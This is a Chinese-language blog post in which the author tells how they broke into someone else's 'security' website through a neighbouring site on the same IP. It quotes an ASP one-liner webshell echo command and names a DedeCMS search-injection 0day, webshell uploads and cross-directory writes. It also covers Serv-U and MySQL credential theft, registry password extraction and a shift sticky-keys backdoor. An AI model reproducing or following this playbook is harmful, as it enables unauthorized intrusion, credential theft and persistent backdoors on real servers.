今天别人给我发了个站，是个安全站，虽然不是很活跃的站吧，还是值得一试的。

 目标站是discuz x2.5的  明显没漏洞，直接旁。。同ip下大概40左右个站吧。。找到一个站。 一看绿色的框就感觉八成是织梦了。网站后面加个dede 找到默认后台，一看是5.7的，data/admin/ver.txt查看一下日期，用那个搜索注入0day秒杀了吧

进后台拿shell就不用我说了吧，直接写php一句话到网站先上asp大马看下组建，WS写着叉子，好吧。。然后看下可写目录，翻了半天终于找到个 C:\wmpub查看下 asp.net, php都支持，直接换aspx马Set 命令能执行

Ipconfig net user 什么命令都不行，看一下iis_spy也被禁了。目标是那个黑客站，所以我先试试跨目录 转到目标站， 在连接后加个 uc_server/control/admin/db.php  爆出物理路径
试着copy 一句话进去， 执行 echo ^<%execute(request("cmd"))%^> >>D:\web\xxxxxx\wwwroot\config\ky1235.php  命令执行成功了，可是一句话连不上。。 于是直接用 copy命令拷贝小马到目标路径 成功执行，上大马，目标站拿下

既然拿下了，那就试试提权吧。。  先看看端口端口开着挺多的。。

能读注册表，先看下终端  端口是3884既然能执行cmd命令，当然先试试溢出了。 换aspx马。。Pr,烤肉什么的都试过了，没有回显。。Systeminfo一看，补丁打了413个，溢出估计不行。换个思路，既然开了43958，试试serv-u直接提权，和suFTP，失败。。 应该是密码换了。下一个思路，用set命令爆出mysql路径，菜刀一连能跨目录，到mysql路径data文件里的user配置文件里面直接查root的密码。。。  能解密。。。 感觉应该拿下没问题了，直接丢给永恒用root提权。   结果导出失败。。。 好吧再下一个思路，翻翻注册表，看看有没有敏感信息。。一看到注册表里有这么个键值眼睛都亮了

直接用华众主机的提权方法找到mysql密码，没用了已经。。 一看mssqlpss那栏是空的，想起来了，根本就没开1433端口，我猜可能就没有sa。。 解出来了mastersvrpass 可是连不上。。好吧。。。突然想起来serv-u的路径还不知道，我看华众主机的路径是        D:\Server_Core\hzhost会不会serv-u也在这个路径下呢，于是文件管理器看下，权限不够，无法浏览。。在cmd下用dir 成功查看， 一看乐了，serv-u就在server_core目录下，直接查看配置文件，用里面的密码试着连接su exp ,真成功了。。 直接添加账号密码进去，一看傻了，被禁用了。。

试另一个账号，依然被禁用。。。。

 

这怎么可能呢。。 难道管理员不远程管理他吗。。 不解中。于是想到了shift后门，永恒用su exp执行之后，成功搞定。。其实用管理员的账号密码连上 ftp 具有写权限，可以直接传木马过去执行，可是手头没有免杀马，所有就放到最后用。 好了，没什么技术含量，可能有点儿错误的地方，大牛勿喷。